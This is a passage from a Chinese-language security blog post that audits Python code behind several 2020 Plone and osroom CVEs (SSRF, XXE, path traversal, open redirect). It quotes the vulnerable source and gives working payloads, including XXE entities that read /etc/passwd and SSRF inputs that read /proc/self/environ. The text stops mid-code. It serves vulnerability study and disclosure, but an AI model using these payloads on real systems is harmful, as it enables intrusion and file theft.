<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="CVE-2020-28735plone–ssrf plone.app.event-3.2.7-py3.6.egg\plone\app\event\ical\importer.py 1234567891011121314151617181920212223242526272829@button.buttonAndHandler(u&#x27;Save and Import&#x27;)    def">
<meta property="og:type" content="article">
<meta property="og:title" content="CodeAudit-Case-Python">
<meta property="og:url" content="https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/index.html">
<meta property="og:site_name" content="w3nq14">
<meta property="og:description" content="CVE-2020-28735plone–ssrf plone.app.event-3.2.7-py3.6.egg\plone\app\event\ical\importer.py 1234567891011121314151617181920212223242526272829@button.buttonAndHandler(u&#x27;Save and Import&#x27;)    def">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://w3nq14.github.io/images/image-20201109094919974.png">
<meta property="og:image" content="https://w3nq14.github.io/images/image-20201109100807462.png">
<meta property="og:image" content="https://w3nq14.github.io/images/image-20201109142113406.png">
<meta property="og:image" content="https://w3nq14.github.io/images/image-20201110100900815.png">
<meta property="og:image" content="https://w3nq14.github.io/images/image-20201113142316180.png">
<meta property="og:image" content="https://w3nq14.github.io/images/image-20201113142402087.png">
<meta property="og:image" content="https://w3nq14.github.io/images/image-20201112174207578.png">
<meta property="og:image" content="https://w3nq14.github.io/images/image-20201112124711645.png">
<meta property="og:image" content="https://w3nq14.github.io/images/image-20201112121033287.png">
<meta property="og:image" content="https://w3nq14.github.io/images/image-20201112133809406.png">
<meta property="og:image" content="https://w3nq14.github.io/images/image-20201112162057637.png">
<meta property="article:published_time" content="2026-03-27T03:39:00.000Z">
<meta property="article:modified_time" content="2026-03-29T10:48:59.420Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://w3nq14.github.io/images/image-20201109094919974.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>CodeAudit-Case-Python</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 8.1.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/WHOAMI-xiaoyu">Projects</a></li><!--
     --><!--
       --><li><a href="/links/">Links</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2026/03/27/EmergencyResponse/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E6%A1%88%E4%BE%8B/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2026/03/27/CodeAudit/CodeAudit-Case-Java/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&text=CodeAudit-Case-Python"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&title=CodeAudit-Case-Python"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&is_video=false&description=CodeAudit-Case-Python"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=CodeAudit-Case-Python&body=Check out this article: https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&title=CodeAudit-Case-Python"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&title=CodeAudit-Case-Python"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&title=CodeAudit-Case-Python"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&title=CodeAudit-Case-Python"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&name=CodeAudit-Case-Python&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&t=CodeAudit-Case-Python"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-28735"><span class="toc-number">1.</span> <span class="toc-text">CVE-2020-28735</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-28736"><span class="toc-number">2.</span> <span class="toc-text">CVE-2020-28736</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-28734"><span class="toc-number">3.</span> <span class="toc-text">CVE-2020-28734</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-28737"><span class="toc-number">4.</span> <span class="toc-text">CVE-2020-28737</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-28738"><span class="toc-number">5.</span> <span class="toc-text">CVE-2020-28738</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-28739"><span class="toc-number">6.</span> <span class="toc-text">CVE-2020-28739</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-28740"><span class="toc-number">7.</span> <span class="toc-text">CVE-2020-28740</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-25406"><span class="toc-number">8.</span> <span class="toc-text">CVE-2020-25406</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-14942"><span class="toc-number">9.</span> <span class="toc-text">CVE-2020-14942</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-24957"><span class="toc-number">10.</span> <span class="toc-text">CVE-2020-24957</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-24958"><span class="toc-number">11.</span> <span class="toc-text">CVE-2020-24958</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-24959"><span class="toc-number">12.</span> <span class="toc-text">CVE-2020-24959</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-24960"><span class="toc-number">13.</span> <span class="toc-text">CVE-2020-24960</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        CodeAudit-Case-Python
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">John Doe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2026-03-27T03:39:00.000Z" class="dt-published" itemprop="datePublished">2026-03-27</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/CodeAudit/">CodeAudit</a>
    </div>


      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h3 id="CVE-2020-28735"><a href="#CVE-2020-28735" class="headerlink" title="CVE-2020-28735"></a>CVE-2020-28735</h3><p>plone–ssrf</p>
<p><code>plone.app.event-3.2.7-py3.6.egg\plone\app\event\ical\importer.py</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">@button.buttonAndHandler(u&#x27;Save and Import&#x27;)</span><br><span class="line">    def handleSaveImport(self, action):</span><br><span class="line">        data, errors = self.extractData()</span><br><span class="line">        if errors:</span><br><span class="line">            return False</span><br><span class="line"></span><br><span class="line">        self.save_data(data)</span><br><span class="line"></span><br><span class="line">        ical_file = data[&#x27;ical_file&#x27;]</span><br><span class="line">        ical_url = data[&#x27;ical_url&#x27;]</span><br><span class="line">        event_type = data[&#x27;event_type&#x27;]</span><br><span class="line">        sync_strategy = data[&#x27;sync_strategy&#x27;]</span><br><span class="line"></span><br><span class="line">        if ical_file or ical_url:</span><br><span class="line"></span><br><span class="line">            if ical_file:</span><br><span class="line">                # File upload is not saved in settings</span><br><span class="line">                ical_resource = ical_file.data</span><br><span class="line">                ical_import_from = ical_file.filename</span><br><span class="line">            else:</span><br><span class="line">                ical_resource = urllib.request.urlopen(ical_url).read()</span><br><span class="line">                ical_import_from = ical_url</span><br><span class="line"></span><br><span class="line">            import_metadata = ical_import(</span><br><span class="line">                self.context,</span><br><span class="line">                ics_resource=ical_resource,</span><br><span class="line">                event_type=event_type,</span><br><span class="line">                sync_strategy=sync_strategy,</span><br><span class="line">            )</span><br></pre></td></tr></table></figure>

<p>如上所述，在读取参数<code> ical_url</code>时，根据程序设置是导入该事件的<code> icalendar</code>资源文件，但对如何读取资源文件没有限制，可以直接使用urllib包进行读取和返回</p>
<p>在Members功能下的<code>Action</code>中选择<code>Enable icalendar import</code>后，配置<code>Icalendar URL</code>参数。</p>
<p>参数：<code>http://127.0.0.1:22</code>，执行<code>Save and Import</code>。</p>
<p><img src="/images/image-20201109094919974.png" alt="image-20201109094919974"></p>
<p>urllib还支持文件协议，因此也可以用于文件读取</p>
<p>参数: <code>file:///proc/self/environ</code></p>
<p><img src="/images/image-20201109100807462.png" alt="image-20201109100807462"></p>
<h3 id="CVE-2020-28736"><a href="#CVE-2020-28736" class="headerlink" title="CVE-2020-28736"></a>CVE-2020-28736</h3><p>plone–xxe</p>
<p><code>plone.app.registry-1.7.6-py3.6.egg\plone\app\registry\browser\records.py</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">def import_registry(self):</span><br><span class="line">        try:</span><br><span class="line">            fi = self.request.form[&#x27;file&#x27;]</span><br><span class="line">            body = fi.read()</span><br><span class="line">        except (AttributeError, KeyError):</span><br><span class="line">            messages = IStatusMessage(self.request)</span><br><span class="line">            messages.add(u&quot;Must provide XML file&quot;, type=u&quot;error&quot;)</span><br><span class="line">            body = None</span><br><span class="line">        if body is not None:</span><br><span class="line">            importer = RegistryImporter(self.context, FakeEnv())</span><br><span class="line">            try:</span><br><span class="line">                importer.importDocument(body)</span><br><span class="line">            except XMLSyntaxError:</span><br><span class="line">                messages = IStatusMessage(self.request)</span><br><span class="line">                messages.add(u&quot;Must provide valid XML file&quot;, type=u&quot;error&quot;)</span><br><span class="line">        return self.request.response.redirect(self.context.absolute_url())</span><br></pre></td></tr></table></figure>

<p>注意<code>importDocument</code>方法，该方法在lxml.etree下调用该方法</p>
<p><code>plone.app.registry-1.7.6-py3.6.egg\plone\app\registry\exportimport\handler.py</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">class RegistryImporter(object):</span><br><span class="line">    &quot;&quot;&quot;Helper classt to import a registry file</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line"></span><br><span class="line">    LOGGER_ID = &#x27;plone.app.registry&#x27;</span><br><span class="line"></span><br><span class="line">    def __init__(self, context, environ):</span><br><span class="line">        self.context = context</span><br><span class="line">        self.environ = environ</span><br><span class="line">        self.logger = environ.getLogger(self.LOGGER_ID)</span><br><span class="line"></span><br><span class="line">    def importDocument(self, document):</span><br><span class="line">        tree = etree.fromstring(document)</span><br><span class="line"></span><br><span class="line">        if self.environ.shouldPurge():</span><br><span class="line">            self.context.records.clear()</span><br><span class="line"></span><br><span class="line">        i18n_domain = tree.attrib.get(ns(&#x27;domain&#x27;, I18N_NAMESPACE))</span><br><span class="line">        if i18n_domain:</span><br><span class="line">            parseinfo.i18n_domain = i18n_domain</span><br><span class="line"></span><br><span class="line">        for node in tree:</span><br><span class="line">            if not isinstance(node.tag, str):</span><br><span class="line">                continue</span><br><span class="line">            condition = node.attrib.get(&#x27;condition&#x27;, None)</span><br><span class="line">            if condition and not evaluateCondition(condition):</span><br><span class="line">                continue</span><br><span class="line">            if node.tag.lower() == &#x27;record&#x27;:</span><br><span class="line">                self.importRecord(node)</span><br><span class="line">            elif node.tag.lower() == &#x27;records&#x27;:</span><br><span class="line">                self.importRecords(node)</span><br><span class="line"></span><br><span class="line">        parseinfo.i18n_domain = None</span><br></pre></td></tr></table></figure>

<p>此方法是此XXE的原因。 在网站设置<code>Site Setup</code>下的<code>Configuration Registry</code>中导出合适的XML文件。 在这里，选择了<code>plone.thumb_scale_table.xml</code>前缀文件。</p>
<p>参数 POC：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&#x27;1.0&#x27; encoding=&#x27;UTF-8&#x27;?&gt;</span><br><span class="line">&lt;!DOCTYPE value [</span><br><span class="line">&lt;!ELEMENT value ANY &gt;</span><br><span class="line">&lt;!ENTITY title SYSTEM &quot;file:///etc/passwd&quot; &gt; </span><br><span class="line">]&gt;</span><br><span class="line">&lt;registry&gt;</span><br><span class="line">  &lt;records interface=&quot;Products.CMFPlone.interfaces.controlpanel.ISiteSchema&quot; prefix=&quot;plone&quot;&gt;</span><br><span class="line">    &lt;value key=&quot;thumb_scale_table&quot;&gt;&amp;title;&lt;/value&gt;</span><br><span class="line">  &lt;/records&gt;</span><br><span class="line">&lt;/registry&gt;</span><br></pre></td></tr></table></figure>

<p>执行后，您可以在错误报告中看到已解析的XML实体。<img src="/images/image-20201109142113406.png" alt="image-20201109142113406"></p>
<h3 id="CVE-2020-28734"><a href="#CVE-2020-28734" class="headerlink" title="CVE-2020-28734"></a>CVE-2020-28734</h3><p>plone–xxe</p>
<p><code>plone.app.dexterity-2.6.5-py3.6.egg\plone\app\dexterity\browser\modeleditor.py</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">class AjaxSaveHandler(BrowserView):</span><br><span class="line">    &quot;&quot;&quot;Handle AJAX save posts.</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line"></span><br><span class="line">    def __call__(self):</span><br><span class="line">        &quot;&quot;&quot;Handle AJAX save post.</span><br><span class="line">        &quot;&quot;&quot;</span><br><span class="line"></span><br><span class="line">        if not authorized(self.context, self.request):</span><br><span class="line">            raise Unauthorized</span><br><span class="line"></span><br><span class="line">        source = self.request.form.get(&#x27;source&#x27;)</span><br><span class="line">        if source:</span><br><span class="line">            # Is it valid XML?</span><br><span class="line">            try:</span><br><span class="line">                root = etree.fromstring(source)</span><br><span class="line">            except etree.XMLSyntaxError as e:</span><br><span class="line">                return json.dumps(&#123;</span><br><span class="line">                    &#x27;success&#x27;: False,</span><br><span class="line">                    &#x27;message&#x27;: &#x27;XMLSyntaxError: &#123;0&#125;&#x27;.format(</span><br><span class="line">                        safe_unicode(e.args[0])</span><br><span class="line">                    )</span><br><span class="line">                &#125;)</span><br><span class="line"></span><br><span class="line">            # a little more sanity checking, look at first two element levels</span><br><span class="line">            if root.tag != NAMESPACE + &#x27;model&#x27;:</span><br><span class="line">                return json.dumps(&#123;</span><br><span class="line">                    &#x27;success&#x27;: False,</span><br><span class="line">                    &#x27;message&#x27;: _(u&quot;Error: root tag must be &#x27;model&#x27;&quot;)</span><br><span class="line">                &#125;)</span><br><span class="line">            for element in root.getchildren():</span><br><span class="line">                if element.tag != NAMESPACE + &#x27;schema&#x27;:</span><br><span class="line">                    return json.dumps(&#123;</span><br><span class="line">                        &#x27;success&#x27;: False,</span><br><span class="line">                        &#x27;message&#x27;: _(</span><br><span class="line">                            u&quot;Error: all model elements must be &#x27;schema&#x27;&quot;</span><br><span class="line">                        )</span><br><span class="line">                    &#125;)</span><br><span class="line"></span><br><span class="line">            # can supermodel parse it?</span><br><span class="line">            # This is mainly good for catching bad dotted names.</span><br><span class="line">            try:</span><br><span class="line">                plone.supermodel.loadString(source, policy=u&#x27;dexterity&#x27;)</span><br><span class="line">            except SupermodelParseError as e:</span><br><span class="line">                message = e.args[0].replace(&#x27;\n  File &quot;&lt;unknown&gt;&quot;&#x27;, &#x27;&#x27;)</span><br><span class="line">                return json.dumps(&#123;</span><br><span class="line">                    &#x27;success&#x27;: False,</span><br><span class="line">                    &#x27;message&#x27;: u&#x27;SuperModelParseError: &#123;0&#125;&#x27;.format(message)</span><br><span class="line">                &#125;)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>上面的代码使用lxml库，但是直接解析xml中的外部参数。 结果，在功能 <code>Dexterity Content Types</code>下选择<code> custom content types</code>，然后单击进入。 <code>fields</code>标签下的<code>Edit XML Field Model</code>可以直接编写xml代码。</p>
<p>参数 POC：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE value [&lt;!ELEMENT value ANY &gt;&lt;!ENTITY title SYSTEM &quot;file:///etc/passwd&quot; &gt; ]&gt;</span><br><span class="line">&lt;model xmlns:i18n=&quot;http://xml.zope.org/namespaces/i18n&quot; xmlns:marshal=&quot;http://namespaces.plone.org/supermodel/marshal&quot; xmlns:form=&quot;http://namespaces.plone.org/supermodel/form&quot; xmlns:security=&quot;http://namespaces.plone.org/supermodel/security&quot; xmlns:users=&quot;http://namespaces.plone.org/supermodel/users&quot; xmlns:lingua=&quot;http://namespaces.plone.org/supermodel/lingua&quot; xmlns=&quot;http://namespaces.plone.org/supermodel/schema&quot;&gt;</span><br><span class="line"> &amp;title;&lt;schema/&gt;</span><br><span class="line">&lt;/model&gt;</span><br></pre></td></tr></table></figure>

<p>因为程序代码中似乎存在问题，所以无法添加XML声明文件，但是打开的默认声明文件具有添加的声明文件。 需要删除。 保存参数，并在返回后单击此处查看它们。</p>
<p><img src="/images/image-20201110100900815.png" alt="image-20201110100900815"></p>
<h3 id="CVE-2020-28737"><a href="#CVE-2020-28737" class="headerlink" title="CVE-2020-28737"></a>CVE-2020-28737</h3><p>osroom–路径覆盖</p>
<p><code>apps\modules\plug_in_manager\process\manager.py</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">def upload_plugin():</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    插件上传</span><br><span class="line">    :return:</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line"></span><br><span class="line">    file = request.files[&quot;upfile&quot;]</span><br><span class="line">    file_name = os.path.splitext(file.filename)         #(&#x27;123&#x27;,&#x27;.zip&#x27;)</span><br><span class="line">    filename = os.path.splitext(file.filename)[0]         #123</span><br><span class="line">    extension = file_name[1]                           #.zip</span><br><span class="line">    if not extension.strip(&quot;.&quot;).lower() in [&quot;zip&quot;]:</span><br><span class="line">        data = &#123;&quot;msg&quot;: gettext(&quot;File format error, please upload zip archive&quot;),</span><br><span class="line">                &quot;msg_type&quot;: &quot;w&quot;, &quot;custom_status&quot;: 401&#125;</span><br><span class="line">        return data</span><br><span class="line"></span><br><span class="line">    if not os.path.exists(PLUG_IN_FOLDER):            #osroom/apps/plugins</span><br><span class="line">        os.makedirs(PLUG_IN_FOLDER)</span><br><span class="line"></span><br><span class="line">    fpath = os.path.join(PLUG_IN_FOLDER, filename)   ##osroom/apps/plugins/123</span><br><span class="line">    if os.path.isdir(fpath) or os.path.exists(fpath):</span><br><span class="line">        if mdbs[&quot;sys&quot;].db.plugin.find_one(</span><br><span class="line">                &#123;&quot;plugin_name&quot;: filename, &quot;is_deleted&quot;: &#123;&quot;$in&quot;: [0, False]&#125;&#125;):</span><br><span class="line">            # 如果插件没有准备删除标志</span><br><span class="line">            data = &#123;&quot;msg&quot;: gettext(&quot;The same name plugin already exists&quot;),</span><br><span class="line">                    &quot;msg_type&quot;: &quot;w&quot;, &quot;custom_status&quot;: 403&#125;</span><br><span class="line">            return data</span><br><span class="line">        else:</span><br><span class="line">            # 否则清除旧的插件</span><br><span class="line">            shutil.rmtree(fpath)</span><br><span class="line">            mdbs[&quot;sys&quot;].db.plugin.update_one(&#123;&quot;plugin_name&quot;: filename&#125;, &#123;</span><br><span class="line">                                         &quot;$set&quot;: &#123;&quot;is_deleted&quot;: 0&#125;&#125;)</span><br><span class="line"></span><br><span class="line">    # 保存主题</span><br><span class="line">    save_file = os.path.join(&quot;&#123;&#125;/&#123;&#125;&quot;.format(PLUG_IN_FOLDER, file.filename))     ##osroom/apps/plugins/123.zip</span><br><span class="line">    file.save(save_file)</span><br></pre></td></tr></table></figure>

<p>上传文件后分割文件和后缀，判断插件是否存在以及是否清理就插件，在下面保存的时候，直接使用了上传的参数名做拼接，导致可以被跨目录保存，比如文件应该保存到<code>osroom/apps/plugins/</code>下，上传如下</p>
<p><img src="/images/image-20201113142316180.png" alt="image-20201113142316180"></p>
<p>我们在系统查看</p>
<p><img src="/images/image-20201113142402087.png" alt="image-20201113142402087"></p>
<h3 id="CVE-2020-28738"><a href="#CVE-2020-28738" class="headerlink" title="CVE-2020-28738"></a>CVE-2020-28738</h3><p><code>apps\modules\user\process\sign_in.py</code></p>
<p>在代码中存在一个获取值的参数<code>next</code>，这个参数是登陆的时候默认没有存在，可能是为了跳转登陆留下的参数。参数值为任意值的时候，返回的<code>to_url</code>的值就为参数值。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">def p_sign_in(</span><br><span class="line">        username,</span><br><span class="line">        password,</span><br><span class="line">        code_url_obj,</span><br><span class="line">        code,</span><br><span class="line">        remember_me,</span><br><span class="line">        use_jwt_auth=0):</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    用户登录函数</span><br><span class="line">    :param adm:</span><br><span class="line">    :return:</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    data = &#123;&#125;</span><br><span class="line">    if current_user.is_authenticated and username in [current_user.username,</span><br><span class="line">                                                      current_user.email,</span><br><span class="line">                                                      current_user.mphone_num]:</span><br><span class="line">        data[&#x27;msg&#x27;] = gettext(&quot;Is logged in&quot;)</span><br><span class="line">        data[&quot;msg_type&quot;] = &quot;s&quot;</span><br><span class="line">        data[&quot;custom_status&quot;] = 201</span><br><span class="line">        data[&#x27;to_url&#x27;] = request.argget.all(</span><br><span class="line">            &#x27;next&#x27;) or get_config(&quot;login_manager&quot;, 